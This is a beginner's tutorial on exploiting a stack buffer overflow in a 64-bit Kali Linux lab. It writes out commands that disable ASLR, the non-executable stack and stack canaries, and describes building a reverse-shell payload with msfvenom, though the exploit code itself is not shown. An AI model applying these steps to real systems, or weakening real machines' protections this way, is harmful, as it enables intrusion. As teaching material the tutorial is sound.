A beginner’s guide to buffer overflow.
What is a buffer and a buffer overflow?
A buffer is a continuous section of memory which stores some data. The problem arises when we try to put more data in the buffer than that it can accommodate. When a program tries to put more data in a buffer, it overwrites the adjacent memory locations and thus, results in a crash. This is known as buffer overflow. Mere overflowing a buffer and making a program crash is of no importance. One is more concerned how they are able to overflow the buffer and run some commands from the context of the vulnerable program.
Creating a buffer is very simple. One just needs to create an array with a given size. An example in C language could be the following.
char buffer[100];
What is a Stack?
A stack is a LIFO (Last In First Out) data structure. There are two operations associated with it. “PUSH” operation puts an object on the “TOP” of the stack and a “POP” operation removes an object from the “TOP” of the stack. A stack is used during function calls to create the associated stack frames for each function call. The stack also stores the “return address” of the function, which is the address to which control should be passed when a function returns.
The above figure depicts a sample stack layout during function calls where one function calls another function. The function arguments are pushed on the stack followed by the “return address” (value in register rip) and the “frame/base pointer” (value in register rbp) which points to the base of the previous stack frame. It should be noted that the first six arguments are not pushed on the stack but stored in registers on a 64-bit architecture whereas in a 32-bit architecture, all the function arguments are pushed on the stack. More information on 64-bit stack frames can be found here.
Whenever a function returns, the “saved return address” is popped from the stack and loaded in register rip and execution continues from that address. In a typical buffer overflow one is more concerned on how to overwrite the “saved return address” in the stack with another address which would point to some executable instructions (shellcode) to spawn a shell.
Setting up the environment
A 64-bit Kali Linux VM and a vulnerable C program. To mitigate the abuse of buffer overflow attacks, there are many protection mechanisms in place. For this basic overflow, we are going to disable these mechanisms.
Note: For building 32-bit binaries, the “gcc-multilib” library needs to be installed in a 64-bit Kali Linux. The “-m32” flag can be passed to gcc in order to create a 32-bit binary.
gcc bof_demo.c -o bof_demo_x86 -m32
Address Space Layout Randomization (ASLR): It is a mechanism which randomly arranges the address space of a process. More information about ASLR can be found here.
On a linux distribution, ASLR can be disabled by typing the following command from a root terminal.
echo 0 > /proc/sys/kernel/randomize_va_space
Data Execution Policy (DEP)/NX/XD: It disables the execution of code in memory pages which are marked non-executable. More information can be found here.
The stack can be marked as executable by passing the flag “-z execstack” with gcc during compilation.
gcc bof_demo.c -z execstack -o bof_demo
One can use the “readelf” command in linux to check if the stack is marked executable.
readelf -l bof_demo
Stack Canaries/Cookies: These are known words which are placed between the buffer and the control data in order to detect a buffer overflow attack. More information can be found here.
Stack canaries can be disabled by passing the flag “-fno-stack-protector” to gcc during compilation, though the flag is selected by default but certain compilers enable canaries if the flag is not explicitly used.
gcc bof_demo.c -o bof_demo -fno-stack-protector
Copy the following vulnerable code and save it as “bof_demo.c”
Compiling the above code
gcc bof_demo.c -o bof_demo -z execstack -fno-stack-protector
Fuzzing
In order to overflow the buffer and change the value of “return address” which is stored in the stack, one needs to find the exact offset. But wait! Before overflowing the buffer and overwriting the “return address” we should know what endianness and canonical address are.
Endianness refers to the organization of bytes in memory. It is of two types: little endian and big endian. In a little endian machine, the least significant byte is stored in the lower address and the most significant byte in the higher addresses whereas in a big endian machine, the most significant byte is stored in the lower address and the least significant byte in the higher addresses.
One can find if the system is little endian or big endian by running the following C program. Also, the command “lscpu” can be used in Linux distributions to check for endianness.
More information on endianness can be found here.
In a 64-bit architecture, the entire 2⁶⁴ bytes are not utilized for address space. In a typical 48 bit implementation, canonical address refers to one in the range 0x0000000000000000 to 0x00007FFFFFFFFFFF and 0xFFFF800000000000 to 0xFFFFFFFFFFFFFFFF. Any address outside this range is non-canonical.
More information on canonical addresses can be found here and here.
In a 32-bit architecture, whenever a buffer is overflown, the register eip gets loaded with the overwritten “saved return address” from stack but that is not the case with 64-bit architecture where the register rip must be loaded with a canonical address else it will never be loaded. Since 0x4141414141414141 (‘A’ = 0x41) doesn’t fall in the required range, it never gets loaded in register rip
So, how to find the correct offset? Simple! The register rbp can be used to calculate the offset as it is overwritten with our payload. This can be observed from the following figure.
Now, let’s find out the starting address of our buffer using gdb.
Note down any address from the above where our buffer is filled with A’s. Prefer addresses which are closer/nearer to the start of the buffer. This address would be later as the value of rip in the final exploit.
Using metasploit’s “pattern_create.rb” script, let’s create a string of length 1000 and redirect the output to a file “fuzz_rbp.in” by typing the following.
`locate pattern_create` -l 1000 > fuzz_rbp.in
Using the value of register rbp let’s calculate the offset
Start gdb and debug the program. Now, run the program with “run” command (shortcut ‘r’) and redirect the input from “fuzz_rbp.in” file created above. Print the value of register rbp in gdb prompt. This is shown in the following figure.
Note the value stored in register rbp and query it with metasploit’s “pattern_offset.rb” script as shown in the above figure. It is found that the value of “saved frame/base pointer” will be overwritten if we write past 608 bytes. And addresses are 8 bytes in a 64-bit machine. So, 608+8=616 bytes need to be written in order to overwrite the “saved frame/base pointer” in the stack. Also, the “saved return address” lies just above it. Hence, 616+8 bytes are required to overwrite the “saved return address”. A canonical address can only be used to overwrite it and not to forget, this machine is a little endian one.
Final payload
Since, we now control the value of register rip, we can make it to do something meaningful, like spawning a shell.
Let’s use “msfvenom” to create a reverse tcp shellcode as shown in the figure.
Now, it’s time to create the final payload with python. Copy the following python snippet and save it as “bof_demo_exploit.py”.
Note: In the following script, the value of rip is the one which is obtained above while determining the starting address of the buffer.
In the above script, python’s struct module has been used to convert the address to little endian style. NOP slides are used to increase the chances of hitting the “shellcode”. Basically, if we point register rip to any address which points to an NOP (No Operation), then the CPU would just keep moving to the next instruction. The bigger the NOP slides, more chances that our guessed value for rip would hit an NOP and finally execute the shellcode. Also, some padding has been given just before overwriting the “return address” to ensure that there is some gap between the shellcode and the “return address”. This was necessary because near the “saved frame/base pointer” some bytes were not overwritten. So, if the shellcode extends till the “saved frame/base pointer” it will not execute properly. This is described in the following figure.
Starting a listener in metasploit for the above payload.
Now, run the “bof_demo_exploit.py” file created earlier, and pipe the output to the “bof_demo” binary as shown in the following figure.
Finally, it can be seen that, a reverse connection is established on using the payload.
The related files for the demo could be found here.
Hope you all enjoyed reading!!